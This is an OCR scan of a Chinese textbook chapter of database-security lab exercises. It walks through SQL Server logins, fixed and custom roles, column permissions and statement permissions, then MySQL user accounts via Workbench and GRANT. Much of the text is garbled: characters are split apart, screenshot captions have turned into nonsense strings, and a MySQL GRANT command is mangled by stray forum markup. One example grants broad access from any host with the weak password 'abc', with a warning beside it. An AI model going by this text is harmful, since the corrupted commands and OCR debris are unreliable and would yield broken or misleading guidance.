(3) 单 击 【 登 录 名 】 文 本 框 旁 边 的 【选项 】 按 钮 局， 打开 【选择 登录 名 】 窗 口 ， 然 
后 单 击 【 浏 览 】 按 钮 ， 打 开 【 查 找 对 象 】 对 话 框 ， 选 择 刚刚 创建 的 SQL Server 登录 账户 
test Manage， 如 图 10-6 所 示 。 

(4) 单 击 【 确 定 】 按 钮 返回 。 设 置 用 户 名 为 test_ Manage， 选 择 架 构 为 dbo， 并 设置 
用 户 的 角色 为 db_owner， 具 体 设置 如 图 10-7 所 示 。 

(5) 单 击 【 确 定 】 按 钮 ， 完 成 数据 库 用 户 的 创建 。 
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图 10-6 ”选择 登录 账户 


服务 器 ; 
| PErER-PC 


数据 库 角色 成 员 身 份 四 : 
角色 成 员 


连接 : 
peter-PC\peter 


加 db_datareader 
恤 坦 要 连接 恒 性 加 ab_dateriter 
回 ab_aanadnin 

回 db_denydatareader 
加 db_denydatarriter 
VV] 

回 db_securityetain 


10-7 新建 数 据 库 用 户 


(6) 为 了 验证 是 否 创建 成 功 ， 可 以 刷新 【用 户 】 节 点 ， 就 可 以 看 到 刚才 创建 的 
test_Manage 用 户 账户 ， 如 图 10-8 所 示 。 


数据 库 用 户 创建 成 功 后 ， 就 可 以 使 用 该 用 户 关联 的 登录 名 test_Manage 进行 登录 ， 
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就 可 以 访问 taobao 的 所 有 内 容 ， 如 图 10-9 所 示 。 


芭 Microsoft SQL | = 
| HD WMD Eu WD IND OW EO Wb 
HE SSG EV AD) IRD OW Ll 太 | 县 四 入 | 风 卓 0 | 
社区 (帮助 () ;村 由 | ?W500 bv 中 训导 |;" 驳 
性 了 5! -PE_Gest Manage (57)| 三 X 
有 新 建 可 询 N) 出 马克 局 本 加 > py ee EC 
— 连接 ” 弄 ? 可 ”号 了 加 
| mm PETER-PC (SQL Server 二 ee 国 = 
人 wsas 八国 ee 
xl » 
e 握 国 回国 系统 到 经 这 
感 dbo 日 国 taobao 国 结果 
旬 guest | 向 致 握 库 关系 图 medald name avalable mage 自 
- | 日 留 表 1 MedaNo1 1 Medall gf 
色 ornion sd 外 rm 2 Wa | ee 
|e 回国 dbo.<%Nd 3 3 MedaNo3 1 Medal3gf 
i ~ 国 国 dbodnta ,| 4 MedaNo4 1 Medal4gf I™ 
Tea mm| ， | TM) | test Manage (57) | master | 000000 | 99 行 
就 结 
I 
图 10-8 查看 【用 户 】 节 点 图 10-9 查看 数据 表 
【实验 报告 】 
【思考 题 】 


分 析 SQL Server 把 登录 账号 与 数据 库 用 户 分 开 有 什么 好 处 。 
10.1.3 ”管理 数据 库 角色 


【实验 目的 】 
掌握 SQL Server 2008 数据 库 服 务 器 的 角色 管理 。 


【原理 简介 】 

角色 是 SQL Server 2008 用 来 集中 管理 数据 库 或 者 服务 器 的 权限 。 数 据 库 管理 员 将 操 
作 数 据 库 的 权限 赋予 角色 。 然后 , 数据 库 管 理 员 再 将 角色 赋 给 数据 库 用 户 或 者 登录 账户 ， 
从 而 使 数据 库 用 户 或 者 登录 账户 拥有 了 相应 的 权限 。 

为 便于 管理 服务 器 上 的 权限 ，SQL Server 提供 了 若干 “角色 ” 这些 角色 是 用 于 分 
组 其 他 主体 的 安全 主体 “角色 ”类 似 于 Microsoft Windows 操作 系统 中 的 “组 ”。 为 方 
便 使 用 和 向 后 兼容 提供 了 固定 服务 器 角色 。 请 尽 可 能 分 配 更 具体 的 权限 。 服 务 器 级 角色 
也 称 为 “固定 服务 器 角色 ” 因为 不 能 创建 新 的 服务 器 级 角色 。 服 务 器 级 角色 的 权限 作用 
域 为 服务 器 范围 。 

可 以 向 服务 器 级 角色 中 添加 SQL Server 登录 名 、Windows 账户 和 Windows 组 。 固 
定 服 务 器 角色 的 每 个 成 员 都 可 以 向 其 所 属 角色 添加 其 他 登录 名 。 

表 10-1 显示 了 服务 器 级 角色 及 其 能 够 执行 的 操作 。 

表 10-2 显示 了 固定 数据 库 级 角色 及 其 能 够 执行 的 操作 。 所 有 数据 库 中 都 有 这 些 
角色 。 
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服务 器 级 角 


表 10-1 服务 器 级 角色 及 其 能 够 执行 的 操作 


色 的 名 称 | 
sysadmin sysadmin 固定 服务 器 角色 的 成 员 可 以 在 服务 器 中 执行 任何 活动 
serveradmin serveradmin 固定 服务 器 角色 的 成 员 可 以 更 改 服务 器 范围 的 配置 选项 和 关闭 服务 器 


Securityadmin 


processadmin 


securityadmin 固定 服务 器 角色 的 成 员 可 以 管理 登录 名 及 其 属性 。 他 们 可 以 
GRANT、DENY 和 REVOKE 服务 器 级 权限 。 如 果 他 们 具有 对 数据 库 的 访问 权限 ， 
还 可 以 GRANT、DENY 和 REVOKE 数据 库 级 权限 。 此 外 , 他 们 还 可 以 重 置 SQL 
Server 登录 名 的 密码 。 

安全 说 明 : 

可 以 授予 对 数据 库 引 擎 的 访问 权限 以 及 配置 允许 安全 管理 员 分 配 大 多 数 服 务 器 权 
限 的 用 户 权限 。securityadmin 角色 应 被 视 为 与 sysadmin 角色 等 效 

processadmin 固定 服务 器 角色 的 成 员 可 以 终止 在 SQL Server 实例 中 运行 的 进程 


setupadmin setupadmin 固定 服务 器 角色 的 成 员 可 以 添加 和 删除 链接 服务 器 
bulkadmin bulkadmin 固定 服务 器 角色 的 成 员 可 以 运行 BULK INSERT 语句 
diskadmin diskadmin 固定 服务 器 角色 用 于 管理 磁盘 文件 
dbcreator dbcreator 固定 服务 器 角色 的 成 员 可 以 创建 、 更 改 、 删 除 和 还 原 任何 数据 库 
每 个 SQL Server 登录 名 都 属于 public 服务 器 角色 。 如 果 未 向 某 个 服务 器 主体 授 
public 予 或 拒绝 对 某 个 安全 对 象 的 特定 权限 ， 该 用 户 将 继承 授予 该 对 象 的 public 权限 。 
只 有 在 希望 所 有 用 户 都 能 使 用 对 象 时 ， 才 对 对 象 分 配 public 权限 
表 10-2 固定 数据 库 级 角色 及 其 能 够 执行 的 操作 
数据 库 级 的 角色 名 称 说 明 
ee db_owner 固定 数据 库 角色 的 成 员 可 以 执行 数据 库 的 所 有 配置 和 维护 活动 ， 


db_securityadmin 


还 可 以 删除 数据 库 
db_securityadmin 固定 数据 库 角 色 的 成 员 可 以 修改 角色 成 员 身 份 和 管理 权 
限 。 向 此 角色 中 添加 主体 可 能 会 导致 意外 的 权限 升级 


db_accessadmin 


db_accessadmin 固定 数据 库 角色 的 成 员 可 以 为 Windows 登录 名 、Windows 
组 和 SQL Server 登录 名 添加 或 删除 数据 库 访问 权限 


db backupoperator db_backupoperator 固定 数据 库 角 色 的 成 员 可 以 备份 数据 库 


db_ddladmin 固定 数据 库 角 色 的 成 员 可 以 在 数据 库 中 运行 任何 数据 定义 语言 


db_ddladmin (DDL) 命令 
. db_datawriter 固定 数据 库 角 色 的 成 员 可 以 在 所 有 用 户 表 中 添加 、 删除 或 更 改 
db_datawriter 数据 


db datareader 


db_datareader 固定 数据 库 角 色 的 成 员 可 以 从 所 有 用 户 表 中 读 取 所 有 数据 


db_denydatawriter 固定 数据 库 角色 的 成 员 不 能 添加 、 修改 或 删除 数据 库 内 用 


db_denydatawriter 户 表 中 的 任何 数据 


db_denydatareader 固定 数据 库 角色 的 成 员 不 能 读 取 数据 库 内 用 户 表 中 的 任 


db _denydatareader 何 数据 


【实验 环境 


SQL Server 2005 以 上 数据 库 系 统 。 
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【实验 步骤 】 

1. 管理 服务 器 角色 

(1) 打开 SQL Server Management Studio， 在 【对 象 资源 管理 器 】 窗 口中 ， 展 开 【 安 
全 性 】 节 点 ， 然 后 再 展开 【服务 器 角色 】 节 点 。 

(2) 双击 sysadmin 节点 ， 打 开 【 服 务 器 角色 属性 】 节 点 ， 如 图 10-10 所 示 ， 然 后 单 
击 【 添 加 】 按 钮 ， 打 开 【 选 择 登 录 名 】 窗 口 。 


| 
| 国 m szmwrczvwssqtsggyz 
| 国 Peerzcvete 


图 10-10 服务 器 角色 属性 


(3) 单 击 【 浏 览 】 按 钮 ， 打 开 【 查 找 对 象 】 对 话 框 ， 启 用 test Manage 选项 旁边 的 
复 选 框 ， 如 图 10-11 所 示 。 单 击 【 确 定 】 按 钮 返回 到 【选择 登录 名 】 对 话 框 ， 


找到 8 个 匹配 所 选 类 型 的 对 象 


区 于 象 如: 


回 苞 mrrrusera] 


图 10-11 添加 登录 名 
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(4) 单 击 【确定 】 按 钮 返回 【服务 器 角色 属性 】 窗 口 ， 在 【角色 成 员 】 列 表 中 ， 就 
可 以 看 到 服务 器 角色 sysadmin 的 所 有 成 员 ,其 中 包括 刚刚 添加 的 test_ Manage, 如 图 10-12 
所 示 。 


国 m szawrrczvwssqLszavzR 
国 "eerrcvwee 
test Manage 


图 10-12 【服务 器 角色 属性 】 窗 口 


(5) 用 户 可 以 再 次 通过 【添加 】 按 钮 添加 新 的 登录 名 ， 也 可 以 通过 【删除 】 按 钮 删 
除 某 些 不 需要 的 登录 名 。 

(6) 添加 完成 后 ， 单 击 【 确 定 】 按 钮 关闭 【服务 器 角色 属性 】 窗 口 。 

2. 配置 用 户 权限 

(1) 打开 SQL Server Management Studio， 在 【对 象 资源 管理 器 】 窗 口 ， 展 开 【 数 据 
库 】 节 点 ， 然 后 再 展开 数据 库 taobao 节点 中 的 【安全 性 】 节 点 。 

(2) 接着 展开 【角色 】 节 点 , 然后 再 展开 【数据 库 角 色 】 节 点 ,双击 db_owner 节点 ， 
打开 【数据 库 角 色 属 性 】 窗 口 。 单 击 【 添 加 】 按 钮 ， 打 开 【 选 择 数 据 库 用 户 或 角色 】 对 
话 框 如 图 10-13 所 示 ， 然 后 单 击 【 浏 览 】 按 钮 打开 【查找 对 象 】〗 对 话 框 ， 选 择 数据 库 用 
户 test_manage， 单 击 【 确 定 】 按 钮 返回 【选择 数据 库 用 户 或 角色 】 对 话 框 。 

(3) 单 击 【 确 定 】 按 钮 ， 返 回 【 数 据 库 角色 属性 】 窗 口 ， 在 这 里 可 以 看 到 当前 角色 
拥有 的 架构 以 及 该 角色 所 有 的 成 员 ， 其 中 包括 刚 添加 的 数据 库 用 户 test Manage， 如 
图 10-14 所 示 。 

(4) 添加 完成 后 ， 单 击 【 确 定 】 按 钮 关闭 【数据 库 角 色 属 性 】 窗 口 。 

3. 用 户 自 定义 角色 

创建 自 定义 数据 库 角色 的 步骤 如 下 。 

(1) 打开 SQL Server Management Studio， 在 【对 和 象 资源 管理 器 】 窗 口 ， 展 开 【 数 据 
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服务 器 
PETER-PC 


连接 : 
peter-PC\peter 


对 查看 连接 区 性 


图 10-14 【数据 库 角 色 属 性】 窗口 


库 】ltaobaol|【 安 全 性 】| 【角色 】 节 点 ， 右 击 【 数 据 库 角色 】 节 点 从 弹出 菜单 中 选择 【新 
建 数据 库 角 色 】 命 令 ， 打 开 【 数 据 库 角色 -新 建 】 窗 口 。 

(2) 设置 【角色 名 称 】 为 TestRole,【 所 有 者 】 选 择 dbo， 单 击 【添加 】 按 钮 ， 选 择 
数据 库 用 户 test Manage， 如 图 10-15 所 示 。 
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bb: erator 
ackupop 
加 aanaanin 


此 角色 的 成 员 吧 ) ; 


角色 成 员 
国 | sonee 


10-15 【数据 库 角色 -新 建 】 窗 口 


(3) 选中 【安全 对 象 】 选 项 ， 打 开 【 安 全 对 象 】 选 项 页 面 ， 通 过 单 击 【搜索 】 按 钮 ， 添 
加 一 个 数据 表 为 “安全 对 象 ”” 选 中 【选择 】 后 面 【授予 】 列 的 复 选 框 ， 如 图 10-16 所 示 。 

(4) 单 击 【 列 权限 】 按 钮 ， 还 可 以 为 该 数据 角色 配置 表 中 每 一 列 的 具体 权限 ， 如 
图 10-17 所 示 。 

(5) 具体 的 权限 分 配 完成 后 , 单 击 【 确 定 】 按 钮 创建 这 个 角色 ， 并 返回 到 SQL Server 
Management Studio。 

(6) 关闭 所 有 程序 ， 并 重新 登录 为 test_Manage。 

(7) 展开 【数据 库 】|ltaobaol|【 表 】 节 点 ， 可 以 看 到 【 表 】 节 点 下 面 只 显示 了 拥有 查 
看 权限 的 表 。 

(8) 由 于 在 【 列 权限 】 窗 口 设置 该 角色 的 权限 为 :不 允许 查看 【商品 信息 】 表 中 的 
【商品 价格 】 列 ， 那 么 在 查询 视图 中 输入 下 列 语句 将 出 现 错误 。 


Select * from taobao 


【实验 报告 】 
按照 实验 步骤 完成 实验 ， 并 记录 实验 过 程 。 
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连接 
peter-PC\peter 


那 二 看 生 接 匠 人 


attachnent 
comments 
commentstatus 
description 
filenane 
filesize 
height 
isattachnent 


国 加 回回 回回 回回 芭 
回国 回国 回国 回回 国光 
回国 回回 回回 回回 已 


| 
| 


图 10-17 分 配 列 权限 
【思考 题 】 
分 析 系 统管 理 员 、sa 用 户 登 录 权限 有 什么 不 同 。 
10.1.4 ”管理 权限 


【实验 目的 】 
掌握 SQL Server 2008 数据 库 服 务 器 的 权限 管理 。 
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【原理 简介 】 

数据 库 权 限 指明 用 户 获得 哪些 数据 库 对 象 的 使 用 权 ， 以 及 用 户 能 够 对 这 些 对 象 执行 
何 种 操作 。 用 户 在 数据 库 中 拥有 的 权限 取决 于 以 下 两 方面 的 因素 。 

e 用 户 账户 的 数据 库 权 限 。 

e 用 户 所 在 角色 的 类 型 。 

权限 提供 了 一 种 方法 来 对 特权 进行 分 组 ， 并 控制 实例 、 数 据 库 和 数据 库 对 象 的 维护 
和 实用 程序 的 操作 。 用 户 可 以 具有 授予 一 组 数据 库 对 象 的 全 部 特权 的 管理 权限 ， 也 可 以 
具有 授予 管理 系统 的 全 部 特权 但 不 允许 存 取 数据 的 系统 权限 。 

在 SQL Server 2008 中 ， 所 有 对 象 权 限 都 可 以 授予 。 

在 服务 器 级 别 ， 可 以 为 服务 器 、 端 点 、 登 录 和 服务 器 角色 授予 对 象 权 限 。 也 可 以 为 
当前 的 服务 器 实例 管理 权限 ; 在 数据 库 级 别 ， 可 以 为 应 用 程序 角色 、 程 序 集 、 非 对 称 密 
钵 、 赁 据 、 数 据 库 角色 、 数 据 库 、 全 文 目 录 、 函 数 、 架 构 等 管理 权限 。 

一 旦 有 了 保存 数据 的 结构 ， 就 需要 给 用 户 授予 开始 使 用 数据 库 中 数据 的 权限 ， 可 以 
通过 给 用 户 授 予 对 象 权 限 来 实现 。 利 用 对 象 权 限 ， 可 以 控制 谁 能 够 读 取 、 写 入 或 者 以 其 
他 方式 操作 数据 。 下 面 简 要 介绍 12 个 对 象 权 限 。 

e@ ”Control。 这 个 权限 提供 对 象 及 其 下 层 所 有 对 象 上 的 类 似 于 主 所 有 权 的 能 力 。 例 

如 ， 如 果 给 用 户 授予 了 数据 库 上 的 “控制 ”权限 ， 那 么 他 们 在 该 数据 库 内 的 所 有 
对 象 〈 比 如 表 和 视图 ) 上 都 拥有 “控制 ”权限 。 
e@ Alter。 这 个 权限 允许 用 户 创建 (CREATE)、 修 改 (ALTER) 或 者 删除 (DROP) 
受 保护 对 象 及 其 下 层 所 有 对 象 。 他 们 能 够 修改 的 唯一 属性 是 所 有 权 。 
Take Ownership。 这 个 权限 允许 用 户 取 得 对 象 的 所 有 权 。 
Impersonate。 这 个 权限 允许 一 个 用 户 或 者 登录 模仿 另 一 个 用 户 或 者 登录 。 
Create。 这 个 权限 允许 用 户 创建 对 象 。 
View Definition。 这 个 权限 允许 用 户 查 看 用 来 创建 受 保护 对 象 的 TSQL 语法 。 
Select。 当 用 户 获得 了 选择 权限 时 ， 该 权限 允许 用 户 从 表 或 者 视图 中 读 取 数据 。 
当 用 户 在 列 级 上 获得 了 选择 权时 ， 该 权限 允许 用 户 从 列 中 读 取 数 据 。 
e Insert。 这 个 权限 允许 用 户 在 表 中 插入 新 的 行 。 
e。 Update。 这 个 权限 允许 用 户 修改 表 中 的 现 有 数据 ， 但 不 允许 添加 或 者 删除 表 中 的 
行 。 当 用 户 在 某 一 列 上 获得 了 这 个 权限 时 ， 用 户 只 能 修改 该 列 中 的 数据 。 
e@ Delete。 这 个 权限 允许 用 户 从 表 中 删除 行 。 
e@ References。 表 可 以 借助 于 外 部 关键 字 关系 在 一 个 共有 列 上 相互 链接 起 来 ， 外 部 
关键 字 关 系 设 计 用 来 保护 表 间 的 数据 。 当 两 个 表 借 助 于 外 部 关键 字 链 接 起 来 时 ， 
这 个 权限 允许 用 户 从 主 表 中 选择 数据 ， 即 使 他 们 在 外 部 表 上 没有 “选择 ”权限 。 

e@ _ Execute。 这 个 权限 允许 用 户 执行 被 应 用 了 该 权限 的 存储 过 程 。 

语句 权限 是 用 于 控制 创建 数据 库 或 者 数据 库 中 的 对 象 所 涉及 的 权限 。 例 如 ， 如 果 用 
户 需要 在 数据 库 中 创建 表 ， 则 应 该 向 该 用 户 授予 CREATE TABLE 语句 权限 。 某 些 语句 
权限 (如 CREATE DATABASE) 适用 于 语句 自身 ， 而 适用 于 数据 库 中 定义 的 特定 对 象 。 
只 有 sysadmin、db owner 和 db_securityadmin 角色 的 成 员 才能 够 授予 用 户 语句 权限 。 
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在 SQL Server 2008 中 的 语句 权限 主要 有 : 

CREATE DATABASE 创建 数据 库 

CREATE TABLE 创建 表 

CREATE VIEW 创建 视图 

CREATE PROCEDURE 创建 过 程 

CREATE INDEX 创建 索引 

CREATE ROLE 创建 角色 

e@ CREATE DEFAULT 创建 默认 值 

可 以 使 用 SQL Server Management Studio 授予 语句 权限 。 


【实验 环境 】 
SQL Server 2005 以 上 数据 库 系统 。 


【实验 步骤 】 

(1) 打开 SQL Server Management Studio， 在 【对 象 资源 管理 器 】 中 展开 【服务 器 】 
节点 ， 然 后 再 展开 【数据 库 】 节 点 。 

(2) 然后 ， 右 击 数据 库 taobao， 从 弹出 菜单 中 选择 【属性 】 命 令 ， 打 开 【 数 据 库 属 
性 】 窗 口 。 

(3) 选中 【权限 】 选 项 ， 打 开 【 权 限 】 选 项 页 面 ， 从 【用 户 或 角色 】 列 表 中 单 击 选 
中 TestRole, 如 果 没有 TestRole， 可 以 单 击 【搜索 】 按 钮 ， 添 加 TestRole 角色 。 

(4) 在 【TestRole 的 权限 】 列 表 中 ， 启 用 【创建 表 】 后 面 【 授 予 】 列 的 复 选 枉 ， 而 
【选择 】 后 面 的 【授予 】 列 的 复 选 框 一 定 不 能 启用 ， 如 图 10-18 所 示 。 


| 
| PETER-PC 授权 者 授予 具有 授予。 拒绝 
IE 有 
Petercweter 侍 程 放生 ho 
| 对 查看 注 按压 性 [ 
| 对 和 宝 钥 he 
she 
he 
ho 
ho 


图 10-18 配置 权限 页 面 
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(5) 设置 完成 后 ， 单 击 【 确 定 】 按 钮 返回 SQL Sever Management Studio。 

(6) 断 开 当前 SQL Server 服务 器 的 连接 ， 重 新 打开 SQL Sever Management Studio， 
设置 验证 模式 为 SQL Server 身份 验证 模式 ， 使 用 test_Manage 登录 ， 由 于 数据 库 用 户 
test Manage 是 TestRole 的 成 员 ， 所 以 该 登录 账户 拥有 该 角色 的 所 有 权限 。 

(7) 单 击 【新 建 查询 】 命 令 ， 打 开 查 询 视 图 。 查 看 taobao 数据 库 中 的 数据 表 ， 结 果 
将 会 失败 ， 如 图 10-19 所 示 。 


文件 日 ”编辑 {E) ”查看 (VW) 查询 (Q) 调式 (D) 工具 中 ”窗口 (W) 社区 (CO) 帮助 (H) 
各 | 及 | 访 | 芒 回 马 | 风电 
;于 WR | master "| 1 执 F009 》 mm v 路 生 | 国 | 小 绚 | 的 


SELECT TOP 1000 [photoid] 
, [filename] 
-Tattachmentl 


;第 2 行 ~ 
8 全 "zaobao"， 架 构 "dbo") 的 列 'viewsa' 的 sgrEgcT| 


i "taopao'， 架构 "abo') 的 列 ,coamenrsrarus' 自 
- "数据 本 ， "tacbao'， 架构 "abo') 的 列 ,cagararua' 的 -四 
1 "taobao' ， 架构 “abo') 的 列 "comments， 的 sez 


小 查询 已 冯 成 ， 但 有 错 .，| PETER-PC (10.50 RTM) | test_Manage (56) | master | 00:00:00 | 0 行 


10-19 SELECT 语句 执行 结果 


(8) 消除 当前 查询 窗口 的 语句 ， 并 输入 CREATE TABLE 语句 创建 表 ， 有 具体 代码 如 
下 所 示 。 

USE taobao 

GO 

CREATE TABLE custorm 

(customid int NOT NULL, 

customname nvarchar (50) NOT NULL, 

customadd nvarchar (50) NOT NULL, 

customphone nvarchar (50) NOT NULL 

) 


(9) 执行 上 述 语句 ， 显 示 成 功 。 因 为 用 户 test_Manage 拥有 创建 表 的 权限 。 
【实验 报告 】 
按照 实验 步骤 完成 实验 ， 并 记录 实验 过 程 。 


【思考 题 】 
在 实际 应 用 中 如 何 保证 授权 的 最 小 权限 原则 ? 举例 说 明 。 
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而 2 _MySQL 数据 库 服务 器 的 安全 配置 


MySQL 是 完全 网 络 化 的 跨 平台 关系 型 数据 库 系 统 ， 同 时 是 具有 客户 -服务 器 体系 结 
构 的 分 布 式 数据 库 管理 系统 。MySQL 是 一 个 精巧 的 SQL 数据库 管 理 系统 ,虽然 它 不 是 
开放 源 代码 的 产品 ， 但 在 某 些 情况 下 可 以 自由 使 用 。 由 于 它 的 功能 强大 、 使 用 简便 、 管 
理 方 便 、 运 行 速度 快 、 安 全 可 靠 性 强 、 灵 活性 、 丰 富 的 应 用 编程 接口 API》 以 及 精巧 
的 系统 结构 ， 受 到 了 广大 自由 软件 爱好 者 甚至 是 商业 软件 用 户 的 青睐 ,特别 是 与 Apache 
和 PHP/PERL 结合 ， 为 建立 基于 数据 库 的 动态 网 站 提供 了 强大 动力 。 

MySQL 的 安全 性 包括 内 部 安全 性 和 外 部 安全 性 两 部 分 。 

(1) 内 部 安全 性 关心 文件 系统 级 的 问题 ， 如 保护 MySQL 数据 目录 免 遭 拥有 运行 服 
务 器 的 机 器 账号 的 用 户 的 攻击 。 如 果 有 人 将 对 应 这 些 表 的 文件 进行 简单 的 替换 ， 数 据 库 
的 安全 性 就 会 受到 破坏 。MySQL 数据 库 管 理 员 必须 做 到 使 该 服务 器 上 的 用 户 对 数据 
目录 中 的 内 容 不 能 直接 访问 。 这 部 分 的 内 容 在 前 面 操作 系统 安全 性 实验 中 已 经 讲 过 了 ， 
在 此 不 再 歼 述 。 

(2) 外 部 安全 性 关心 客户 机 从 外 部 连接 的 问题 ， 如 防止 MySQL 服务 器 免 遭 通过 网 
络 进来 的 通过 服务 器 的 连接 请 求 对 数据 库 内 容 访问 的 攻击 。MySQL 服务 器 提供 了 一 个 
通过 MySQL 数据 库 中 的 授权 表 来 实现 的 灵活 的 权限 系统 。 可 以 设置 这 些 表 的 内 容 来 允 
许 或 拒绝 数据 库 对 客户 机 的 访问 。 


10.2.1 管理 用 户 账号 


【实验 目的 】 
掌握 MySQL 数据 库 服 务 器 的 用 户 管理 。 
【原理 简介 】 


MySQL 管理 员 应 该 知道 怎样 通过 指定 哪些 用 户 可 连接 到 服务 器 、 从 哪里 进行 连接 ， 
以 及 在 连接 时 做 什么 ， 来 设置 MySQL 用 户 账号 。MySQL 3.22.11 引入 了 两 个 更 容易 进 
行 这 项 工作 的 语句 : GRANT 语句 创建 MySQL 用 户 并 指定 其 权限 ，REVOKE 语句 删除 
权限 。 这 两 个 语句 充当 MySQL 数据 库 中 的 授权 表 的 前 端 ， 并 提供 直接 操纵 这 些 表 内 容 
的 可 选择 的 方法 。 

GRANT 和 REVOKE 语句 影响 以 下 4 个 表 。 

user: 可 连接 到 服务 器 的 用 户 和 他 们 拥有 的 任何 全 局 特权 。 

db: 数据 库 级 的 特权 。 

Tables_priv: 表 级 特权 。 

Columns_priv: 列 级 特权 。 
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还 有 第 5 个 授权 表 (host)， 但 它 不 受 GRANT 或 REVOKE 的 影响 。 

为 某 个 用 户 发 布 GRANT 语句 时 ， 应 在 user 表 中 为 该 用 户 创建 一 个 项 。 如 果 该 语 
名 指定 了 所 有 全 局 特权 〈 管 理 权限 或 用 于 所 有 数据 库 的 权限 )， 则 这 些 指定 也 被 记录 在 
user 表 中 。 如 果 指 定 了 数据 库 、 表 或 列 的 权限 ， 它 们 将 记录 在 db 、tables_priv 和 
columns_priv 表 中 。 使 用 GRANT 和 REVOKE 语句 比 直接 修改 授权 表 更 容易 。 

本 节 下 面 的 部 分 将 讨论 如 何 设置 MySQL 用 户 的 账号 和 授权 ， 还 将 介绍 如 何 取消 权 
限 以 及 从 授权 表 中 删除 全 部 用 户 ， 并 且 将 考虑 一 个 困扰 许多 新 的 MySQL 管理 员 的 难 
题 。 还 要 考虑 使 用 mysqlaccess 和 mysql setpermission 脚本 ， 它 们 是 MySQL 分 发 包 的 
组 成 部 分 。 这 些 是 Perl 的 脚本 ， 它 们 提供 了 设置 用 户 账号 的 GRANT 语句 的 代用 品 。 
mysql_setpermission 需要 具有 DBI 的 支持 环境 。 


【实验 环境 】 
MySQL 5.5 以 上 数据 库 系 统 。 


【实验 步骤 】 

1. 创建 新 用 户 和 授权 

(1) 打开 MySQL Workbench 5.2 CE， 单 击 Server Administration， 出 现 如 网 10-20 所 
示 对 话 框 ， 单 击 OK 后 出 现 登录 界面 ， 输 入 密码 即 可 进入 服务 器 管理 界面 ， 如 图 10-21 
所 示 ， 在 该 软件 中 可 以 实现 对 数据 库 的 管理 。 


‘Workbench central 


UN Welcometo MySQL Workbench 
CE et 


hanges in this My SQL Workbench release. 


外 op Connection to start 


EE Local MySQLS5 
Local Type Wndowe 


人 "ew Comnecton 


be mu ET 


Sot sept ~ = mooem 本 so 


一 | 国 "39 serve Inetanoes 


图 10-20 MySQL Workbench 


(2) 单 击 左 侧 的 Users and Privileges， 出 现 如 图 10-22 所 示 的 用 户 和 权限 管理 界面 。 
选中 一 个 用 户 可 以 查看 该 用 户 对 应 的 角色 、 权 限 。 
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A smerbe 
coNFcuaanoN 
FF optionsFie 


rm acaieab6751 
sEcumnmy 

~ Usersandprvileges 
DATA PcpORT/ RESTORE 

仿 Data export and Restere 


图 10-21 Server Administration 
wa 


Acmn (Local MysaLss) > 
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Tesh ond objedBrowaer 
MANAGEMENT 
© Sener gatus 
starwp/ snuteown 
园 saeurane Systen vadabler oon] Writ nme Roies Mesontl amit 
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Detaile for Acrount rootOlncalhost 


Role Global Privdeges Assoned to User 
人 四 ee 
FF OptiensFle MainteranceAcmn je ALTER ROUTINE 
ee 
ao -ea rie 
CRENETABLERAGE 
SR 


机 rt CREATEUSER 
总 Data bot and Restore 


SadkapAdmin 


图 10-22 Users and Privileges 


(3) 单 击 右 侧 栏 中 的 Add Account 按钮 可 以 添加 一 个 账户 ， 如 图 10-23 所 示 。 在 右 
侧 栏 的 Login 选项 卡 页 面 中 可 以 设置 用 户 名 、 用 户 的 登录 密码 。 
(4) 单 击 右 侧 栏 的 Administrative Roles 标签 ， 设 置 用 户 的 权限 和 角色 。 给 newuser 
用 户 设 置 一 个 DBManager 的 角色 ， 系 统 自动 添加 上 BackupAdmin 角色 ， 在 权限 列表 部 
分 可 以 看 到 这 两 个 角色 所 对 应 的 权限 ， 如 图 10-24 所 示 。 
(5) 单 击 Apply 按钮 ， 把 用 户 添加 到 数据 库 中 。 重 启 数据 库 后 ， 通 过 DOS 命令 窗口 
打开 C:\Program Files\MySQL\MySQL Server 5$.S\binmysql -u newuser -p， 输 入 newuser 
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© semersatus 
目 santupyr snuteown 
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图 10-23 ”增加 用 户 界 面 


© semer satu: 
sartwp/ snuteown 
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CONAGURATON 
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图 10-24 设置 用 户 角 色 和 权限 
的 口令 ， 如 果 成 功 则 打开 MySQL 控制 台 ， 如 果 失 败 则 重新 打开 MySQL Workbench。 
单 击 newuser， 选 择 Login 选项 卡 ， 修 改 “Limit Connectivity to Hosts Matching” 为 


“1localhost”， 则 从 本 机 可 以 打开 MySQL 控制 台 。 
(6) 除了 使 用 MySQL Workbench 添加 用 户外 ， 管 理 员 还 可 以 使 用 MySQL 控制 台 


通过 命令 添加 用 户 和 权限 。 
用 户 可 以 在 MySQL Workbench 的 Users and Privileges 中 选择 一 个 用 户 , 然 


(7) 删除 
击 Remove 按钮 ， 就 可 以 删除 掉 该 用 户 了 。 命令 行 需要 用 DELETE 语句 将 该 用 户 的 


后 和 
记录 从 user 表 中 直接 删除 。 
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2. 命令 行 添加 用 户 
(1) 增加 一 个 用 户 testl 密码 为 abc， 让 他 可 以 在 任何 主机 上 登录 ， 并 对 所 有 数据 库 
有 查询 、 插 入 、 修 改 、 删 除 的 权限 。 首 先 用 root 用 户 连 入 MySQL， 然 后 输入 以 下 命令 : 


grant select,insert,update,delete on *.* to [email=testl@"%]testl@"s% 
[/email]" Identified by "abc""; 


但 增加 的 用 户 是 十 分 危险 的 , 如 果 某 个 人 知道 testl 的 密码 , 那么 他 就 可 以 在 Internet 
上 的 任何 一 台 计 算 机 上 登录 你 的 MySQL 数据 库 并 对 你 的 数据 为 所 欲 为 了 ， 解 决 办 法 见 
(2 

(2) 增加 一 个 用 户 test2 密码 为 abc, 让 他 只 可 以 在 localhost 上 登录 ， 并 可 以 对 数据 库 
mydb 进行 查询 、 插 入 、 修 改 、 删 除 的 操作 (localhost 指 本 地 主机 ， 即 MySQL 数据 库 所 
在 的 那 台 主机 )。 这 样 用 户 即 使 知道 test2 的 密码 ， 他 也 无 法 从 Internet 上 直接 访问 数据 
库 ， 只 能 通过 MySQL 主机 上 的 Web 页 来 访问 了 。 


grant select,insert,update,delete on mydb.* to [email=test2@localhost] 
test2@localhost [/email] identified by "abc"; 


c:\Program Files\MySQL\MySQL Server 5.5\bin>mysql -u root -p 
Snoer Bode 生生 才 册 业者 重用 和 和 

Welcome to the MySQL monitor. Commands end with ; or \g. 
Your MySQL connection id is 11 

Server version: 5.5.15 MySQL Community Server (GPL) 


Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights 
reserved. 


Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 
owners. 


Type 'help;' or '\h' for help. Type '\c' to clear the current input 
statement. 


